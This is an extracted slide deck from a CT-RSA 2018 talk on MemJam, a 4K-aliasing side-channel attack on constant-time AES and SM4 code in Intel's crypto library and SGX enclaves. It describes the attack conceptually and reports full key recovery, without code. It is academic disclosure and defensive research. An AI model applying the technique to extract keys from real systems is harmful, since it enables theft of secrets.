#RSAC SESSION ID: CRYP-T07 MEMJAM: A FALSE DEPENDENCY ATTACK AGAINST CONSTANT-TIME CRYPTO IMPLEMENTATIONS IN SGX Daniel Moghimi Ph.D. Student Worcester Polytechnic Institute @danielmgmi
MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX Ahmad “Daniel” Moghimi Thomas Eisenbarth Berk Sunar April 17, 2018 CT-RSA 2018 - San Francisco, CA
Data Dependency • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 3
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 4
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 IF sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 5
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 IF ID sub %eax, %edx 2 IF xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 6
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 IF ID EX sub %eax, %edx 2 IF ID xor %ecx, %ecx IF 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 7
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 IF ID EX WB sub %eax, %edx 2 IF ID EX xor %ecx, %ecx IF ID 3 IF add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 8
Data Dependency – Pipelined Execution • Data dependency: Instruction Data of a preceding instruction add %ebx, %eax 1 IF ID EX WB sub %eax, %edx 2 IF ID EX EX WB xor %ecx, %ecx IF ID 3 EX WB EX WB IF ID add %eax, %edi 4 EX WB IF ID sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 9
Data False Dependency • Pipeline stalls without true dependency. • Reasons: • Register Reuse • Limited Address Space add %ebx, %eax 1 xor %ecx, %ecx 2 sub %eax, %edx 3 mov $100, %edx 4 FD sub %edx, %ecx 5 10
Data False Dependency – Register Renaming • Pipeline stalls without true dependency. • Reasons: • Register Reuse • Limited Address Space add %ebx, %eax add %ebx, %eax 1 1 xor %ecx, %ecx 2 xor %ecx, %ecx 2 Register sub %eax, %edx sub %eax, %edx 3 3 Renaming mov $100, %edx 4 mov $100, %bat 4 FD sub %edx, %ecx 5 sub %bat, %ecx 5 11
Memory ry False Dependency – 4K Aliasing • Memory loads/stores are executed out of order and speculatively. • The dependency is verified after the execution! mov %eax, (%ebx) Execute Execute Store Load Store mov ( %ecx), %edx Load Dependent? Yes • 4K Aliasing: Addresses that are 4K apart are assumed dependent. • Re-execute the load and corresponding instructions due to false dependency. • Virtual-to-physical address translation Memory disambiguation 12
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 13
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 Load 0xFECD2 Load 0xFECD3 Load 0xFECD4 Load 0xFECD5 Load 0xFECD6 Load 0xFECD7 Load 0xFECD8 14
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 Load 0xFECD2 Execute & Time Load 0xFECD3 Load 0xFECD4 Load 0xFECD5 Load 0xFECD6 Load 0xFECD7 Load 0xFECD8 15
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABCDEF Load 0xFECD1 Store 0x12ABCDEF Load 0xFECD2 Execute & Time Store 0x12ABCDEF Load 0xFECD3 Store 0x12ABCDEF Load 0xFECD4 Store 0x12ABCDEF Load 0xFECD5 Store 0x12ABCDEF Load 0xFECD6 Store 0x12ABCDEF Load 0xFECD7 Store 0x12ABCDEF Load 0xFECD8 Store 0x12ABCDEF Store 0x12ABCDEF 16
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABC200 Load 0xFECD1 Store 0x12ABC200 Load 0xFECD2 Execute & Time Store 0x12ABC200 Load 0xFECD3 Store 0x12ABC200 Load 0xFECD4 Store 0x12ABC200 Load 0xFECD5 Store 0x12ABC200 Load 0xFECD6 Store 0x12ABC200 Load 0xFECD7 Store 0x12ABC200 Load 0xFECD8 Store 0x12ABC200 Store 0x12ABC200 17
4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABC Load 0xFECD1 Store 0x12ABC Load 0xFECD2 Execute & Time Store 0x12ABC Load 0xFECD3 Store 0x12ABC Load 0xFECD4 Store 0x12ABC Load 0xFECD5 Store 0x12ABC Load 0xFECD6 Store 0x12ABC Load 0xFECD7 Store 0x12ABC Load 0xFECD8 Store 0x12ABC Store 0x12ABC 18
MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) 19
MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks 20
MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks 21
MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks 2005 – 2006 – Percival – 2015 – Irazoqui Osvik – Cache – S $ A Cache 2014 – Yarom – Missing for Flush+Reload attacks Fun 22
MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks • Intra-cache line Leakage (4-byte granularity) • Higher time correlates Memory accesses with the same bit 3 to 12 • 4 bits of intra-cache level leakage 23
MemJam Attack CPU Core Core HT HT HT HT Encryption Service 24
MemJam Attack CPU Core Core HT HT HT HT Encryption Service 25
MemJam Attack CPU Core Core HT HT HT HT Encryption Service 26
MemJam Attack CPU Core Core HT HT HT HT Execute load compute load load compute load compute load load Encryption Service 27
MemJam Attack CPU Core Core HT HT HT HT Execute load compute load load compute load compute load load Encryption Service 28
MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load compute load load Encryption Service 29
MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load compute load load Encryption Service 30
MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load Higher time if compute there are more load number of 4K load Encryption conflicts Service 31
Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 S-Box Lookup 32
Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 A B C D S-Box Lookup Local Buffer 33
Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 A B C D B S-Box Lookup Local Buffer 34
MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 35
MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 36
MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 37
MemJam Attack on AES 64 Bytes LINE 2 4 Cache Lines 38
MemJam Attack on AES 64 Bytes LINE 2 4 Cache Lines 39
AES Key Recovery ry 40
AES Key Recovery ry 41
SM4 Blo lock cip ipher – cpSMS4_Cipher • Standard Cipher support by Intel • Chinese National Standard for Wireless LAN WAPI • S-Box + Unbalanced Feistel Structure • Protected by Cache State Normalization • Recursive attack Full key recovery with 40K observations 42
MemJaming In Intel SGX Secure Enclave CPU Core Core HT HT HT HT Execute load Intel SGX compute Execute Again Enclave load load compute load Higher time if compute there are more load number of 4K load Encryption conflicts Service 43
Recommend
More recommend